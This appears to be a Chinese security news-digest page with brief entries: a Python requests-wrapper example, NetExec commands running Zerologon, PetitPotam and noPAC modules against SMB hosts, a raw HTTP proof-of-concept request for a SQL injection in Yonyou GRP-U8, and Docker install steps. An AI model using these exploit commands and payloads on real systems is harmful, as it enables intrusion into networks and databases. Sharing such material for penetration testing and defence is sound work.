Quan

WEB安全 内网安全 终端对抗 威胁情报 搜索内容
WEB安全
一个对requests库的简单封装
感觉这样写起来贼方便,突然就明白了二次封装的好处了
from SimpleRequestFramework import SimpleRequestFramework

custom_headers = {
    "User-Agent": "CustomUserAgent/1.0",
    "Authorization": "Bearer YOUR_TOKEN"
}
# new a framework instance, and set the save directory, use proxy, proxy type, proxy address, and custom headers
framework = SimpleRequestFramework(
    save_directory="output_files",
    use_proxy=True,
    proxy_type="http",
    proxy_address="http://127.0.0.1:8080",
    headers=custom_headers
)

# GET request example
get_url = "https://api.ip.sb/ip"
params = {
    "param1": "value1",
    "param2": "value2"
}
framework.fetch_and_save(get_url, "output_get.json", method="GET", params=params)

# POST request example
post_url = "https://httpbin.org/post"
data = {
    "data1": "value1",
    "data2": "value2"
}
framework.fetch_and_save(post_url, "output_post.json", method="POST", data=data)
https://github.com/0Chencc/SimpleRequestFramework
内网渗透
据说是一款比crackmapexec功能更强大的内网实用工具
下载地址
官方文档
粗略看了一下,它支持漏洞扫描,尽管只有三个
Zerologon
NetExec smb <ip> -u '' -p '' -M zerologo
PetitPotam
NetExec smb <ip> -u '' -p '' -M petitpotam
noPAC
NetExec smb <ip> -u 'user' -p 'pass' -M nopac
其余的感觉跟cme差不多
https://github.com/Pennyw0rth/NetExec
威胁情报
用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞 
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A2BF47E766B3CFCFA6BB152CC6C175B9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

userName=*
https://mp.weixin.qq.com/s?__biz=MzIzOTM2MzczNQ==&mid=2247483909&idx=1&sn=85d193a38c0b9c72d5220e69c8db83fa
WEB安全
Docker && docker-compose Ubuntu快速安装
最近经常高频使用dockerdocker-compose,没事就百度,总结一下
1.装docker
curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun
2.装docker-compose
从Github下载docker-compose
移动到 /usr/local/bin/docker-compose
赋予执行权限
 chmod +x /usr/local/bin/docker-compose
https://www.redteam.wang
WEB安全
从反编译小程序到Getshell
或许真的应该跟上时代的潮流,学习一些新的技能/知识了。传统的web似乎有点打不动了...
https://mp.weixin.qq.com/s?__biz=MzU3MDg2NDI4OA==&mid=2247489188&idx=1&sn=e30bc65694b9a63dcf1bf5d83da5291c